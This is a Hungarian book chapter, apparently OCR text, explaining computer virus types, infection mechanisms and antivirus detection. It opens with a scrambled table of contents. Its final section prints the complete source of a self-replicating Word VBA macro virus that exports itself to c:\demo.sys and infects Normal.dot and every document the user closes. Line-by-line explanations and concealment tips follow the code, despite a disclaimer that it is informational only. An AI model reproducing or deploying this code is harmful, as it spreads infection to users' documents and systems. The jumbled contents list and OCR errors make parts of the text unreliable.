8 Stealth vagy rejtőzködő vírusok 5.11 Férgek .2 Companion vírusok 5.1 Defektes cluster mint álcázás 5.5.4.5.3 Videokártyák .4 Logikai bombák 5.7 Polimorf vírusok 5.4.2 Modul vagy osztálymodul? 5.1.4.3 A vírus felépítése Hogyan fertőz meg a vírus egy fájlt? 5.4. fejezet .a Normal.4.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.5.1.dot fájl 5.5.1 Így fertőznek a bootszektor vírusok 5.4.az ILOVEYOU és társai 5.4 Modul makrók 5.3 Vírusok kontra ServiceRelease 5.Tartalom 5.2 A dropper vírust helyez el 5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg .6 Hálózati vírusok 5.1 Minden ténykedés központja .5 Word makrovírus írása 5.3.4.3.12 Időzítők 5.5.1.3 Killerprogramok 5.4.4 A legfontosabb vírustípusok rövid áttekintése 5.5.4.10 Update vírusok 5.1 Bootszektor vírusok 5.2 5.4.9 TSR fájlvírusok 5.1 Alapok 5.4.4.5 Makrovírusok 5.az elvetemült támadók búvóhelyei? 5.

7.8.8.1 Mi az a féreg? 5.1 Szkennermodul 5.7.kommentárokkal 5.8.7 A vírus jelszóval védi a fájlt 5.3 Hogyan tudott a féreg elterjedni? 5.5.5.5.142 A működési mód 5.4 A vírusvédő program kiválasztásának a szempontjai .2 Víruspajzs 5.7.8.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.7 Megfertőzött osztálymodulok ILOVEYOU 1385.4 A forrás .3 „Fertőtlenítő" 5.8 Hogyan működnek a vírusvizsgálók? 5.7.6 5.

jelenti az MSNBC.. úgy. az USA fel adta a hivatalos ellenállást. Doktori disszertációjához fejlesztette ki az önmagát reprodukáló program elméletét. a vírus minden billentyűzet-bevitelt feljegyez. mivel az ezekkel kódolt adatokat nem lehet viszszafejteni. hogy kódolás közben kvázi kukucskál a felhasználó válla fölött. A Magic Lantern azelőtt kezd működni. Az FBI-nak sok szerverrel nem lesz nehéz dolga. vagy ismert biztonsági réseken becsempészi magát a szerverszoftverbe. hogy a kemény kódolóprogramok az exporttilalom ellenére is elterjedtek. amely megteremti a dekódolás előfeltételeit. Az amerikai szövetségi rendőrség.Veszélyes fájlok 5. az FBI egy eljárást fejleszt. Egy Magic Lantern nevű szoftver segítségével az FBI specialistái a jövőben egy olyan vírust tudnak becsempészni a gyanús szerverekre. Csak miután az ipar bizonyítékokat szerzett arról. és elküldi az FBI-nak. 1983-ban programozta az első hivatalosan ismertté vált vírust Fred Cohan a dél-kaliforniai egyetemről. mielőtt még az adatok kódolása megtörténne. Az általa . A US-hatóságok szemében már régóta tüskét jelentettek az erős kódolásra alkalmas programok.5 Vírusok .com online média. Ezután a vírus mailben fogja elküldeni magát. amellyel a kódolt adatokat már a keletkezésük helyén dekódolni lehet .1 Alapok Az FBI kódolás elleni vírust fejleszt Minden eszközzel a potenciális terroristák ellen . Ha a fertőzött számítógépeken elindítanak egy kódolóprogramot. és rögtön bizonyítékkal is szolgált..

5. 5. Ez történhet egy olyan fertőzött program elindításával. Gyakran éppen az ártalmatlannak vélt fájlok okozzák a legnagyobb károkat. hogy a vírus a program indításakor azonnal aktiválódni tudjon. Ezek azonban többnyire erőteljes túlzások. Egy vírustámadás következtében azonban bizonyos körülmények között minden adat és program elveszhet. A második rész tartalmazza a tulajdonképpeni fertőzőrutint. vagy . A videokártya memóriáját a vírus legfeljebb egy azonosító tárolására használhatja. amelyet interneten. a vírus bemásolja a programkódját a fájlba. mert egy EXE fájllal sok felhasználó már eleve óvatosan bánik. mintha egy képről. és az elfoglalt clustert (helyfoglalási egységet) hibásnak mutatja. Fertőzésnek az orvostudomány azt a folyamatot nevezi. akkor vírusellenőrzést kell végezni.programozott vírus Unix operációs rendszer alatt futott. végrehajtható fájlt keres. vagy írjon ki egy meghatározott szöveget. A valóságban jelentősen több kár éri a számítógépes rendszereket és az adataikat szabotázsoktól. a szakszerűtlen kezeléstől vagy a hackertámadásoktól.2 Miről ismeri fel a vírusvizsgáló a vírust? Minden vírusnak van egy jellemző bitmintája.3 Videokártyák az elvetemült támadók búvóhelyei? A videokártyák gyakran állnak vírushordozó gyanújában.4. Persze nem vezethető vissza vírusra a számítógéppel történő munka során fellépő hibák mindegyike. Ebben a részben található a programkód is. vagy csak jelzik a hibát. amelyek hasonló körülmények között eddig nem léptek fel.1. . hogy a vírus mondjuk x napon rajzoljon egy képet a monitorra. Mivel a komputervírusok a biológiai vírusokhoz hasonlóan viselkednek. az adatokat csak tárolja. vagy egy destruktív kártevőről. és a vírus arra használja. amelyről a vírus felismeri önmagát. CD-n vagy lemezen keresztül lehet kapni. hogy a rendszer minden felhasználója megkapott minden elérési jogot. Valójában ez lehetetlen: egy videokártya videomemóriája nem bootképes. az kiderül a későbbiekben. Ezért egyetlen vírus sem tud közvetlenül a videokártya memóriájából a számítógép végrehajtható memóriájába kerülni. Ez hexadecimális karaktereknek egy 10-16 bájt hosszú láncából áll. Ennek ellenére óvatosnak kell lenni: ha hirtelen olyan hibák jelennek meg. amely szükség esetén úgy alakítja át a fájlt. hogy: „a következő újraindításnál formattáld a merevlemezt". Ha ez a hex-pattern már ismert. ami jelentős anyagi károkat okoz. Ártalmatlan esetben itt található az utasítás. hogy ártalmatlan vírusról van-e szó. 5. fel lehet használni egy meghatározott vírus kereséséhez az adathordozón. Az egyik ilyen mechanizmus például megakadályozza. amelynél a kórokozók átterjednek egyik egyedről a másikra.2 A vírus felépítése Minden vírus három vagy gyakrabban négy programrészből áll: az első rész egyfajta ismertetőjegy. például egy merevlemezre kerül. De ez a hely tartalmazhatná azt a parancsot is.a bootszektor vírusoknál . Hogy az Offíce-alkalmazások makrovírusai milyen veszélyesek lehetnek. hogy meg van-e már fertőzve egy fájl.1 Defektes cluster mint álcázás A vírusoknak többnyire álcázómechanizmusaik vannak. hogy felismerje. Az újságokban és a televízióban újra és újra horrorisztikus híreket hallani új és veszélyes vírusokról. A harmadik rész dönti el. Itt először egy szubrutinról van-e szó. Ha talál ilyet. A legtöbb felhasználói program (tehát a vírusvizsgálók is) egyszerűen átugorják a hibás clustereket. A legtöbb esetben a szoftver vagy egy meghajtó hiányosságáról van szó. A hatása az volt. A vírus az egyik vírushordozóról egy másik potenciális vírushordozóra. A program általában álcázva van. egy Word vagy egy Excel fájlról lenne szó.a lemez egy fertőzött bootrutinjával. és a megmaradt tárterületet mutatják meg. amely még nem fertőzött.1. fertőzött-e már egy fájl. 5. amelyek védik őket a lelepleződéstől. A keresés csak az önmagukat kódoló vírusoknál válik problematikussá. itt is az átviteli folyamatot nevezik fertőzésnek. hogy a felhasználó felfedezze a vírus elfoglalta tárterületet a merevlemezen. Az esetleges álcázási eljárás szubrutinja is itt található. a hex-pattern. mint a vírusoktól és következményeiktől. A vírus befészkelődik az adathordozó egy tetszőleges helyére. A vírusok állítólag a kártya videomemóriájába fészkelik be magukat. amely közepes vagy nagy katasztrófát vált ki. ami csak egy kis tréfát csinál. Ennek a segítségével tudja bármikor ellenőrizni.

a vírus pedig elrejtőzik valahol az adathordozón. Egyes antivírus-programok megkísérlik a dropperek felismerését. Egyes vírusok azonban sokkal gátlástalanabbul viselkednek. Itt található az a parancs.4. hogy azokhoz is hozzáférkőzzön. Felhasználóként legfeljebb a fertőzött program indulási sebességének a minimális változását vesszük észre. a betöltőprogram csak egy jelzést küld a képernyőre: nem rendszerlemez. ahogyan a vírus beveszi magát egy programba. ugyanolyan méretű vagy nagyobb. Minden fertőzésmódnak létezik néhány variánsa. a merevlemezre vagy egy fájlba. A vírust az ilyen lemez is hordozhatja. és minden programnál a vírusprogram címét adják meg. mint a vírus. az a saját feladatainak a futtatása előtt először a vírusprogramra ugrik. a vírusbetöltő először a vírust indítja el. amelyeknek a fájlmelléklete vírust rejt. és ezután áttereli a beolvasást az átültetetett eredeti bootszektorra. majd az továbbítja az elérést a helyes címre. mint a vendéglátója. Az ilyen vírusok a hajlékonylemezek bootszektorát és/vagy a master boot recordot (MBR). A droppereket egy bizonyos vírus átvitelére alkalmas programként vagy egyszerűen egy szabotázs segédeszközeként írják meg. illetve DOS-bootszektort fertőzik meg a merevlemezen. Az eredeti címeket a vírus egy rendezett listára helyezi. a vírusokat el lehet távolítani. nem is vírussal fertőzött program. hogy milyen vírusról van szó.3. illetve a master boot partíciós szektort vagy a DBR-t. 5. A vírus ezen a módon olyan lemezeken is terjedhet.A negyedik résszel zárul a kör. Ha a programot elindítják. mert a „fertőzésveszély" a típustól függően nagyobb vagy kisebb. megint visszaugrik arra a helyre. mivel a nem bootképes lemezeknek is van egy minimális bootszektoruk. amennyire a programkódjukhoz szükség van. Az ilyen figyelmeztetésekben általában azt is megadják. Más vírusok átírják a FAT-ben található könyvtárinformációt. a helyére pedig a saját betöltőprogramját írja. Több módszer kombinációja is gyakran előfordul. a fájl. és ettől a perctől kezdve még meg nem fertőzött fájlokat keres.3 Hogyan fertőz meg a vírus egy fajit? A fájlok megfertőzésénél a legnagyobb különbségek a módban vannak. akkor kompletten átírja a fájlt. Most már minden alkalommal. . a DOS boot recordot. és megfertőzze őket. Emellett vannak még hibrid vírusok is. csak fájlokat. Többnyire a mailektől óvnak. ám ha lefut. Ez egy rutin. Egy bootszektor vírus a következőképpen terjed. ahol eredetileg megszakította a folyamatot.3. egy vírust telepít a memóriába. A víruskódnak ez a fájlhoz fűzése nem okoz maradandó károsodást a fertőzött fájlon. Ha a gép indításkor a bootszektorhoz ér. és annyival meghosszabbítja. Az alábbiakban egy rövid áttekintést adunk a legfontosabb vírustípusokról és sajátságaikról. amelyek a bootszektort és a fájlokat is meg tudják támadni. Ha egy programot elindítanak. amennyi helyre szüksége van. mint a Form és a Stoned vírus. Sok vírus egy futtatható fájl végéhez fűzi a saját programkódját. Ha ezt végrehajtotta. Ha a bootolási kísérletnél nem talál operációs rendszert. ahol a vírus megszakította a program futását. amelyek nem tartalmaznak programokat. először a vírus indul el. és egyszerűen átírnak a fájlból annyit. Ha a vírus nagyobb. 5. 5. s az újabbaknak ez általában sikerül is. akkor ez először elindítja a vírust.1 így fertőznek a bootszektor vírusok A vírusok egy másik típusa áthelyezi az eredeti bootszektort.1 Bootszektor vírusok A leggyakrabban fellépő vírusok az olyan bootszektor vírusok. 5. ezért is lehet egyre nehezebben osztályozni a vírusokat. amely utasítja a BlOS-t az operációs rendszer betöltésére.4 A legfontosabb vírustípusok rövid áttekintése A vírusfigyelmeztetések szinte már a napi rutinhoz tartoznak az interneten. az elejére pedig egy hivatkozást tesz erre a kódra. mikor a programot elindítják. Ha a gazdaprogram.2 A dropper vírust helyez el A dropper nem vírus. Ez fontos. amellyel a program a víruskód végrehajtása után visszatér oda. 5. akkor ez viszonylag észrevétlenül történhet.

A vírusprogramozónak az a fő előnye. 5. Az. A vírus erre a célra egy fertőzésszámlálót tartalmaz. Eddig a vírus még semmit sem csinált. A bootszektor vírusok PC-ket támadnak meg. A különböző bootszektor vírusok működési módjai a részleteikben ugyan különböznek egymástól. amelyek nem DOS-alapúak. amit tartalmaz. vagy hogy milyen vírusvédő programot telepítettek rá. a folytatáshoz üssünk le egy tetszőleges billentyűt amennyiben nem talál rajta DOS-rendszerfájlokat. hogy az EXE fájl egyáltalán nem változik. amelyek a vírussal fertőzöttek. mint azt egy döbbent Unix-felhasználó megtapasztalta. hogy milyen operációs rendszert használ a gép. A fertőzés csak a fertőzött lemezről történő indítási kísérletnél következhet be. nehogy másoknak okozzanak károkat továbbadáskor.4. tehát a vírus fut le. a PC ugyan megfertőződík. Mivel azonban fogja a flopiról olvasás/flopíra írás interruptját. a vírusprogram minden A: meghajtóra/-ról irányuló írási vagy olvasási műveletnél (habár azt gondoljuk. ami bekerül az A: meghajtójába. elindítja az EXE programot is. még ha ez a kísérlet sikertelen is lenne. amelyek bizonyos számú fertőzés után tönkreteszik a fertőzött gép merevlemezét. az operációs rendszer vagy a védőprogram még egyáltalán nincsen betöltve. tehát kioldjuk a meghajtózárat. Semmi jelentősége nincs annak. így a gépünk most minden lemezt megfertőz. és a BIOS-ban Boot from Floppy van beállítva: tehát a számítógép megpróbál erről a lemezről elindulni. Ajánlott a számítógép fő bootszekvenciáját úgy beállítani a BIOS-ban.Kapunk egy flopit adatokkal. és az eredeti MBR-t a merevlemez egy más pontján helyezi el. és ezt a nevet begépeljük. A lemezt behelyezzük az A: meghajtóba. hogy a számítógépe és ezáltal a lemez is bootszektor vírussal fertőzött. 5. a BIOS-t még mindig át lehet állítani egy tiszta(!) lemezről bootolásra. hogy először mindig a merevlemezről próbáljon bootolni. második lehetőségként pedig meg lehet adni a CD-ROM meghajtót. A fertőzött flopik bootszektoráról kerülnek fel a gépre. azonban nem tudja. és a vírus programja lefut. mint a Stoned vírus. hogy lefuttassa a kódot. hogy egy vírus ilyen módon terjed.4. de az alapelv mindegyiknél ugyanaz. Egyes operációs rendszereknél. Ha egy merevlemez-problémánál a bootolás lehetetlenné válna (headcrash vagy hasonló). és innentől kezdve az indítási folyamat a megszokott módon folytatódik. és csak így lehet őket továbbadni (egy bootszektor-vírus nem tud például a hálózaton keresztül terjedni). az EXE fájlhoz készítenek egy azonos nevű COM fájlt. Ezeket az intéző alapértelmezésben nem mutatja. installálja a Stoned vírust a bootszektorába. vagy hogy kiírja: Nem rendszerlemez. ami mostanra azonban már nem más. A vírus memóriarezidenssé válik. mikor megtudják. mikor a bootszektor vírus telepíti magát. és így nem tud terjedni. A következő reggelen újból bekapcsoljuk a számítógépet. Ha ezután elindul a gép a merevlemezről. minden a legnagyobb rendben működik. és ebben keresendő a bootszektor vírusok gyakoriságának az oka is. amelyeket kapunk. például készített egy újabb companion vírust egy újabb fájlhoz. mikor 2000. és ezután betölti az eredeti MBR-t.3 Killerprogramok A killerprogramok olyan vírusok. csak a lemezek vizsgálatakor tudják felismerni és törölni a bootszektor vírusokat. a valóságban a vírus ír a lemezre) megvizsgálja a lemezt. a vírus azonban nem tudja a gépbe helyezett lemezekre másolni magát. de nem sok. Ha ezután megpróbáljuk elindítani az EXE fájlt. amelyben benne van a víruskód. Kárt azonban ugyanúgy okozhat ezeken a gépeken is. és elkezdjük használni az adatait. Ha a vírus befejezte a ténykedését. és ezzel a körforgás elölről kezdődik. az adathordozóról történő olvasás és írás interruptjára.2 Companion vírusok Ha egy COM és egy EXE fájlnak ugyanaz a neve. Ha eléri . mert abban a pillanatban. működési módjuk miatt. rátelepszik a 13h interruptra. Telepíti magát a merevlemezre. lefut az MBR. akitől a lemezt kaptuk. Az elrejtéshez gyakran a rejtett vagy a rendszer tulajdonságot adják a fájlnak. és így a megváltoztatott programok némelyike egyáltalán nem is veszi észre. A lemez még az A: meghajtóban van. és lenyomunk valamilyen billentyűt. kicseréli magára az MBR-t. Valamikor kikapcsoljuk a számítógépet. Betölti a lemez első szektorát a memóriába. Volt néhány igazán sikeres companion vírus. helyette a COM program. Sokan meg vannak lepve. amely egy rögzített értéktől kezdve visszaszámol. a DOS először mindig a COM fajit hajtja végre. ennek ellenére gondosan ellenőrizzük vírusvizsgálóval. olvasásról van szó. és ha még nincs megfertőzve. A companion vírusok is ezt a körülményt használják ki. hogy egy vírus terjed. hogy úgy tűnjön. Ezt az üzenetet már ezerszer láttuk. előbb vagy utóbb pedig tovább adjuk ezeknek a lemezeknek valamelyikét. A boot-támadás idején azonban tehetetlenek. A lemezeket. Ez a flopi azonban Stoned vírussal fertőzött. március 6-án a Michelangelo vírus meglepetésszerűen lecsapott a gépére. A vírusvizsgálók.

az a későbbiekben fog kiderülni. „D" és „E" kollégák bejelentkeznek. és ezért ezen a környezeten kívül hatástalanok. az is megfertőződik a vírussal. ezek is megfertőződnek. Egyes esetekben a vírus ilyenkor kiadja és lefuttatja a FORMÁT C: parancsot.a nullát. és a címjegyzékéből minden kollégája kap egy mailt a vírussal. A különböző címjegyzék-bejegyzéseken keresztül a vírus gyorsan eljut az üzletfelekhez. minden kezdődik elölről. azonnal viharos sebességgel el is terjed rajta. Ezek a vírusok nem programfüggelékként terjednek a rendszerekben. amelyek például Mac és MS-DOS gépeken is tudnának működni. mert ez a vírustípus csak flopin keresztül terjed. amint bekerül egy hálózatba. 4. belátható időn belül aligha lesznek olyan vírusok. 5. Másképp történik a fertőzés az olyan vírusoknál. Ilyenkor minden fájl ott marad ugyan a merevlemezen. Valamennyi végrehajtott fájl megfertőződik. kiváltja a rombolóakciót. 7. A vírusnak tehát nem kell a szokásostól eltérően viselkednie ahhoz.4. és futtatják a ferőzött fájlokat. valószínűleg egy e-mail mellékletével vagy egy barátja demólemezével. Hogy a makrovírusok hogyan működnek. a koncepciójuknál fogva. A klasszikus hálóvírusok az úgynevezett férgek. amelyek ezáltal ugyancsak megfertőződnek.és így tovább. azonban a legtöbb vírus hálózaton is tud terjedni. és minden rendszer más programozási követelményeket állít.. „A" kolléga további programokat futtat a merevlemezén. A fájlvírusok ezzel szemben a következőképpen fertőznek hálózaton keresztül: 1. A legtöbben azt hiszik. és végrehajt egy fertőzött fájlt. például egy bizonyos szó vagy felhasználói név beírása vagy hiánya. és önálló programként tudják lefuttatni magukat. Más sajátosságai mellett saját magát szaporította. 5. és milyen trükköket vetnek be álcázásként. A makrovírusok például egy másikra tudják cserélni a Mentés parancsot. amelyek több operációs rendszerben is tudnának terjedni. Az ILOVEYOU a maga idejében pontosan ilyen vírus volt. ha „A" kolléga lefuttatja a fájlt. 5. hálózatra csatlakozó számítógép fertőzött. hogy fájlok olvasása és írása ugyanolyan módon történik a szerveren. 2. a felhasznált programnyelv alapján adatokat tudnak törölni vagy módosítani. és így lavinát vált ki. Olyan vírusok.5 Makrovírusok A makrovírusok olyan vírusok. még akkor sem.dot fájlt. Ez azonban a valóságban sokkal bonyolultabb. mint lokálisan. „C". 3.dot végződéssel) és már Excel fájlokban is találunk. ha több.6 Hálózati vírusok Speciális hálózati vírusokból még kevés van.doc vagy . Makrovírusokat jellemzően Microsoft Word dokumentumokban (. A vírusok. hogy egy vírus. Még kompu- . 5.. Amint megnyitunk egy fertőzött Word dokumentumot. Más vírusok minden fájlt törölnek az adathordozón. hogy a szerveren is meg tudjon fertőzni fájlokat. Ezek a vírusok többnyire egy meghatározott rendszerre korlátozódnak: a bombák rendszerint csak egy megadott környezeten belül tudják reprodukálni magukat. ez azt jelenti. A vírus „B" kolléga gépén is memóriarezidens lesz. helyi merevlemezén és a szerveren. A vírus memóriarezidenssé válik. . amelyek adatfájlokat fertőznek meg. Itt elég. barátokhoz stb. amelyek elküldik magukat a mail-címjegyzék minden címére. „A" kolléga megfertőzi a számítógépét. „B" kolléga több más programot futtat saját. Ha ezek a kollégák ugyancsak megnyitják a mellékletet.. Először is a bootszektor vírusok nem tudnak hálózaton keresztül terjedni. az megfertőzi a Normal.4 Logikai bombák A logikai bombák a vírusok különleges fajtái: ezeknek a működésbe lépését kiválthatja egyfajta időzítő vagy egy feltétel teljesülése. Ha ezután egy dokumentumot mentünk vagy nyitunk. csak az adatállomány többé nem olvasható és használható. 6. Mivel ezek minden rendszerben mások.4. milyen parancsokat tudnak kiváltani. „B" kolléga bejelentkezik a szerverre. A hálózat egy DOS-eszközt emulál. A legbarátságtalanabb változat a FAT bejegyzéseit változtatja meg. „A" kolléga néhány programot a hálózaton futtat. mindig egy rendszer gyenge pontjaira vannak kihegyezve. még nincsenek.4. hanem önállóan tudják reprodukálni a saját kódjukat.

a vírus azt mondja magában: „Aha. Ezért egy ilyen vírust nem lehet egyszerűen egy meghatározott bájtsorozatról felismerni. Az ilyen álcázási képességek azonban gyakrabban figyelhetők meg bootszektor vírusoknál. mint fájlvírusoknál. amelyeknek nincs szükségük arra. Az ilyen vírusok már akkor megfertőznek egy fájlt. A vírusprogramozó ezt a programot szeretné a legjobban becsapni. A Green Caterpiller fertőzőrutinját viszont minden olyan folyamat kiváltja. A komputerférgek saját magukat tudják reprodukálni. bár ez az esetek 99%-ára igaz. és aztán a fertőzött bootszektor helyett az eredeti tartalmát prezentálom.4.7 Polimorf vírusok Az antivírus programok leggyakrabban használt fajtája a szkenner. ha az még nem fertőzött. amelyből egy helyen nem fordul elő két másolat. hasonló trükkel szintén el tudják titkolni a létezésüket úgy. de a legtöbb esetben egy program csak akkor fertőződik meg. hogy egy TSR vírus terjedni tudjon. Ezeknél nem klasszikus vírusról van szó. hogy minden program.4. ha csak megnyitjuk azt (például egy adatmentésnél bizonyos körülmények között minden fájlt megnyitnak. Ha újabb verzió van telepítve. és ezeket többnyire egyetlen programozó vagy egy csoport fejleszti.OVL fájlok.11 Férgek . amelyeket az a vírusfertőzés előtt tartalmazott.9 TSR fájlvírusok A második leggyakoribb vírusfajta a TSR fájlvírus. mert a mailforgalom egyfolytában növekedett. Egyes vírusok overlay fájlokat (programok lapozófájljai) fertőznek meg. amelyek ugyanazt a bájtsorozatot tartalmaznák. mint amilyen a Frodo. A stealth vírusoknál viszont. 5. az ilyen típusú vírus fájlokat támad meg. Egyes vírusokat gyorsan fertőző vírusoknak is neveznek.8 Stealth vagy rejtőzködő vírusok Ha egy vírus memóriarezidenssé tud válni. 5.az ILOVEYOU és társai A komputerférgek olyan programok.) Az első gyorsan fertőző vírus a Dark Avenger volt. Ahhoz. Ha igen. itt valaki látni akarja a bootszektort. 5. Mint a neve is mutatja. csak azokat a bájtokat látja. amely ellenőrzi.4. és minden további futtatás ismét elindította a küldést. Ha bootszektor vírusról van szó. Az 1986-ban készült Éráin vírus volt az első olyan. hogy a fájlok tartalmazzák-e már a vírus egy régebbi verzióját. amely a víruskódok egy bizonyos repertoárja után kutat.tercégeknél is egész részlegeket bénított meg. Családokra oszlanak. azok közül is általában a COM és az EXE . amely meghatározza. Hi-hi. egymáshoz kapcsolódó programszegmensből állnak. ha egy tetszőleges program megpróbálja olvasni a bootszektort. akkor az a 13h interruptot használja (az adathordozók olvasása/írása). és a végrehajtható programoknak sem feltétlenül kell COM vagy EXE kitérjesztésűeknek lenniük. ahová eltettem. mert egy bootszektor vírushoz sokkal egyszerűbb álcázórutint írni. amelyik ezzel a trükkel dolgozott. hogy megfertőzze. a DIR parancs). Használnak még más fertőzőrutinokat is. aki el akarja csípni. A polimorf vírus olyan kártevő. ami pedig a komputeres világban megjelenő vírusok 99%-ára igaz. ennél sokkal összetettebb és nehezebb feladatot kell megoldania annak. hanem azzal rokon zavaróprogramokról. De ez még nem minden: a rutin azt is megvizsgálja. akkor ezzel nem fertőz újra. A hex pattern mellett ezek a vírusok nemcsak egy verziószámot tartalmaznak. és általában minden utána elindított programot megvizsgál. azonban van néhány eszközmeghajtó vírus is. amelyek azonban vírust is tartalmazhatnak.10 Update vírusok Az update vírusok különösen ravasz kórokozók. Egyszerűen beolvasom az eredeti bootszektort onnan. amit a meghajtó tartalmaz. valakinek le kell futtatni a fertőzött programot.4." Ezáltal a lekérdező programnak semmi szokatlan sem tűnik fel. amelyek önállóan tudnak egy hálózaton terjedni. akkor legalább egy interruptot fogni tud. amikor végrehajtják. 5. fájlokat.4. hanem egy update rutint is. A férgek önálló programok. A fájlvírusok. 5. hogy gazdaprogramokhoz fűzzék magukat. amely a fájlt olvassa. A vírus memóriarezidenssé válik. Többnyire több. hogy a vírus fellépett-e már valamely verziójában. hogy milyen fájlok állnak rendelkezésre az adathordozón (pl. és hálózati funkciók segítségével más számítógépekre másolódnak. akkor lecseréli ezeket. ezek az *.

5 Word makrovírus írása Biztos. Az időzítők feltételeinek a választéka szinte határtalan. és minden API-funkciót is ismer (API = Application Programming Interface). Ez a kérdés azonban csak erre a dokumentumra érvényes.5. és a Normal. Íme. hogy milyen trükkökkel álcázhatják a programozók a programjaikat. Itt különösen fontos tudni.5. annak nagyon egyszerű a makrók írása. ezért kell a fertőzéshez a Normal. amelynek a sablonjában makrók voltak.ActiveVBProject.3 Vírusok kontra ServiceRelease Az SR-1 a Microsoft egy ServiceRelease-e. ha valakitől egy olyan dokumentumot kapott. Ebben a fájlban lehetnek a makrók.4. Ezekbe kerülnek az önálló projektrészek.sys" 5. nem pedig megvalósítás céljára. amit a VB alatt is használni tudunk. hogy az egészet csak tájékoztatásnak szánjuk. VBComponents(" demo"). esetleg UserFormról lesz-e szó. amely minden nap. vagy kétkedőn a tiltásukat választotta.dot fájl A Word minden indításkor betölt egy globális fájlt.5. amely a WordBasicben elérhetetlenné teszi a MacroCopy és Application OrganizerCopy parancsokat. De a Word idegen szövegeknél megkérdezi. Minden parancsnak a birtokában van.2 Modul vagy osztálymodul? A vírusok mindig egy osztálymodulban vagy egy modulban vannak. akkor ezek a fájl megnyitásakor rendszerint ugyancsak megnyílnak és aktívvá válnak. hogy Modulról vagy Osztálymodulról. amelyeket bárhol újra elő lehet venni. 5. Ezt a fájlt támadják meg.dot-ot. de hatalmas. Elméletileg így például születésnapi üdvözletet lehet valakinek küldeni. a vírusspecialista Aciidfreak útmutatója. Itt a Beszúrás menüből kiválasztjuk. A UserFormok a makroprogramozás szempontjából nem érdekesek. A VBA lassú. hogy aktiválja-e a makrókat is. amely a szóban forgó napon automatikusan elindul. Lehet. VBE. 5. ugyanabban az órában indul el. hogy milyen veszély bújik meg mögöttük.1 Minden ténykedés központja . a modulok és az osztálymodulok a fontosak. Sub AutoCloseQ For I = 1 To NormalTemplate. A vírusprogramon belül egy rutin lekérdezi a rendszeridőt. Először a modulokban lévő makrovírusokkal foglalkozunk.Export "c:\demo. már megérte az ismertetés. hogy a Wordot megfertőzzék.Count . A feltétel lehet a bekapcsolástól számított időtartam vagy egy előre meghatározott dátum.12 Időzítők Az időzítők a vírusok speciális kioldómechanizmusai. A következő oldalakon sok minden kiderül a Word makrovírusok programozásáról. kiváltja a vírus akciótartalmának a végrehajtását. de biztosan nem volt a tudatában annak. Attribute VB_Name = "demo" On Error Resume Next Application. 5. még nem fertőzött DOCfájlba.5. Ha a Word fájlok makrót tartalmaznak.dot-ból minden. Ha ezzel valaki meg tud úszni egy Word makrovírust vagy legalább felismeri azt. hogy mindenki látta már a Word megerősítő kérdését. A naptári dátumok mellett olyan rutint is lehet használni. amelyek azután minden dokumentumra érvényesek.5. Ez a makrovírus alapÖtlete. de egy vírusíró erre mindig talál megoldást. de hangsúlyozzuk. Egy modul elkészítéséhez az Eszközök/Makró/Visual Basic-kel megnyitjuk a Word makroszerkesztőjét. Ha az elér egy rögzített értéket.a Normal.4 Modul makrók Az alábbiakban megtalálható minden. Aki tud VB-ben programozni.VBProject. a Normal. hogy a makrók engedélyezésére kattintott. és milyen potenciális veszélyeket hordoznak ezek.VBComponents. valamennyire módosított formában. 5.dot-ba másolni a makrovínisokat. amire egy Word makrovírushoz szükség van.

akkor a Dobj-t NormalTemplate. True-ra állítja az Activlnstall-t. VBProject-re állítja.Count If ActiveDocument.sys fájlba exportálja. Az álcázáshoz .dot-on keresztül célzottan másolni is lehet a makrókat.VBComponents. ami elárulná a vírust. VBE. VBProject. Itt rögzíti. IfActiveDoaiment. ezenkívül a Normal.ActiveVBProject.Import ("c: \demo. az attól függ.Name NormInstall = True Next I = "demo" Then For I = l To ActiveDoctiment. VBProject Ha az aktív dokumentumban. hogy mire lett állítva a Dobj.dot-ban és nem az aktív dokumentumban vagyunk.dot-ban van egy modul. For I = 1 To ActiveDocument. VBProject. amelyeket be lehet építeni. akkor a Dobj NormalTemplate. ahány modul található az aktív dokumentumban.VBComponents(I).dot-ban vagyunk.VBCpmponents(I). Dobj.Count Ez egy For ciklus. VBCpmponents(I).Export "c: \demo.stealth A Word alapértelmezésben megmutat egy modult a VB Editorban. VBProject_ Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. hogy később kiváltsa az aktív dokumentumba importálást. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. If NormalTemplate. VBComponents. VBProject. VBComponents(I). Sub AutocloseQ Ez a sub minden alkalommal lefut. vagy az aktív dokumentumba. VBProject Itt a feltétel fordítva is átfut: Ha a Normal. True-ra állítja a NormalInstall-t. És a modul neve általában a vírus neve. Hogy melyik fájlba lesz csomagolva. For I = 1 To NormalTemplate.sys") End Sub így ni. VBProject Dobj. Annyiszor ismétli meg a For és a Next közötti kódot. Az álcázás .dot-ba. egyszerűen a következő parancsot hajtatja végre.sys") Itt importálja az elején exportált fájlt (a vírust). Application.If NormalTemplate. Most néhány funkció következik.Name = "demo " Then Normlnstall = True Ha a Normal. ezt most fogjuk most darabokra szedni.Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate.VBProject. VBComponents. Ha hiba lépne fel.Name = "demo" Then ActivInstall = True Ha az aktív dokumentumban van egy modul. VBComponents.VBProject. amit demo-nak hívnak (tehát a vírus). ahány modul van a Normal.VBProject. ha egy dokumentumot bezárnak. Attribute VB_Name = "demo" A Demo a modul neve.sys" A modult a C\demo. If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. Ebben a fájlban benne van az egész forráskód.Import ("c:\demo.dot-ban. ahelyett. Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. hogy később lehetőleg egy fertőzendő fájlba lehessen importálni. és nem a Normal. hogy később melyik fájlba importál: vagy a Normal. Count Ez egy For ciklus. VBComponents ("demo"). AutoExit. Annyiszor ismétli az utána következő kódot. Autoexec. VBProject-re lesz állítva. Vannak még más autofunkciók is. amelynek a neve „demo" (tehát. mint a vírusé).VBComponents. amelyek automatikusan végrehajtódnak: például AutoOpen.VBProject. hogy hibaüzenetet írna ki. On Error Resume Next Ez esetleg a VB-ből már ismert.

